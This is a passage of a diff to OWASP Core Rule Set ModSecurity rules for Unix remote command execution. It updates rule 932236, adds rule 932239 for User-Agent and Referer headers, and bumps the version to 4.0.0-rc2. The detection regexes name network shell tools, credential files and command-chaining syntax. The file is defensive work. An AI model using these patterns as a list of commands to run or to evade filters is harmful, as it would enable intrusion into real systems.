<>])|hci?|i(?:t[\s\v&\)<>\|]|mp[\s\v<>]|nsh)|o[\s\v&\)<>\|]|r(?:c|ep[\s\v<>])|awk|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up)[\s\v&\)<>\|]|e(?:ad[\s\v<>]|xdump)|i(?:ghlight|story)[\s\v<>]|ost(?:id|name)|ping3|t(?:digest|passwd))|i(?:d[\s\v&\)<>\|]|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v<>]|onice|spell)|j(?:js|q|ava[\s\v<>]|exec|o(?:(?:bs|in)[\s\v<>]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v<>]|all)|nife[\s\v<>])|l(?:d(?:d?[\s\v&\)<>\|]|config)|[np][\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)<>\|]|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a|ore))|a(?:st(?:[\s\v<>]|comm|log(?:in)?)|tex[\s\v<>])|ess(?:[\s\v<>]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v<>]|o(?:(?:ca(?:l|te)|ok)[\s\v<>]|g(?:inctl|(?:nam|sav)e))|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:n[\s\v&\)<>\|]|il(?:q|x[\s\v<>])?|ke[\s\v<>]|wk)|tr|v[\s\v&\)<>\|]|(?:kdir|utt)[\s\v<>]|locate|o(?:(?:re|unt)[\s\v<>]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp)|ofetch)|l[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v<>]|sm|wk)|ice[\s\v<>]|o(?:de[\s\v<>]|hup)|roff|s(?:enter|lookup|tat))|o(?:d[\s\v&\)<>\|]|ctave[\s\v<>]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:x[\s\v&\)<>\|]|s(?:swd|te[\s\v<>])|tch[\s\v<>])|d(?:b|f(?:la)?tex)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp[\s\v&\)<>\|]|i(?:c(?:o[\s\v<>])?|p[^\s\v]|dstat|gz|ng[\s\v<>])|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v<>]))|s(?:ftp|ql)?|t(?:x|ar(?:diff|grep)?)|xz|er(?:f|l(?:5|sh)?|ms)|opd|ython[^\s\v]|u(?:ppet[\s\v<>]|shd))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v<>]|u))|cp[\s\v&\)<>\|]|e(?:d(?:[\s\v&\)<>\|]|carpet[\s\v<>])|v|a(?:delf|lpath)|(?:name|p(?:eat|lace))[\s\v<>]|stic)|m(?:[\s\v&\)<>\|]|dir[\s\v<>]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|l(?:ogin|wrap)|nano|oute[\s\v<>]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v<>])|e(?:d[\s\v&\)<>\|]|t(?:[\s\v&\)<>\|]|arch|env|facl[\s\v<>]|sid)|ndmail|rvice[\s\v<>])|g|h(?:[\s\v&\)<>\|]|\.distrib|ell|u(?:f|tdown[\s\v<>]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|(?:ash|nap|plit)[\s\v<>]|diff|ftp|l(?:eep[\s\v<>]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v<>])|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v<>f]|sk(?:set)?)|bl|e(?:e|x[\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v<>]|datectl))|o(?:p|uch[\s\v<>])|c(?:l?sh|p(?:dump|ing|traceroute))|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:l(?:[\s\v&\)<>\|]|imit[\s\v<>])|n(?:ame|compress|expand|iq|l(?:ink[\s\v<>]|z(?:4|ma))|(?:pig|x)z|rar|s(?:et|hare)[\s\v<>]|z(?:ip|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|diff)|ew[\s\v<>]|gr|pw|rsh)|algrind|olatility)|w(?:3m|c|h(?:o(?:ami|is)?|iptail)|a(?:ll|tch)[\s\v<>]|get|i(?:reshark|sh[\s\v<>]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:um|arn|elp[\s\v<>])|z(?:ip(?:details)?|s(?:h|oelim|td)|athura|c(?:at|mp)|diff|[e-f]?grep|less|more|run|ypper))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|an|io|ulimit)|s(?:h|plit|vtool)|u(?:(?:t|rl)[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|lumn[\s\v&\)<>\|]|m(?:m(?:and[\s\v&\)<>\|])?|p(?:oser|ress)[\s\v&\)<>\|])|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|ython[^\s\v])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash|nap)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \
     "id:932236,\
     phase:2,\
     block,\
@@ -535,7 +589,27 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
+    severity:'CRITICAL',\
+    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|lumn[\s\v&\)<>\|]|m(?:m(?:and[\s\v&\)<>\|])?|p(?:oser|ress)[\s\v&\)<>\|])|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|ython[2-3])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:c|a(?:ll|tch)[\s\v&\)<>\|]|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \
+    "id:932239,\
+    phase:1,\
+    block,\
+    capture,\
+    t:none,\
+    msg:'Remote Command Execution: Unix Command Injection found in user-agent or referer header',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-shell',\
+    tag:'platform-unix',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/2',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -555,13 +629,13 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-she
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
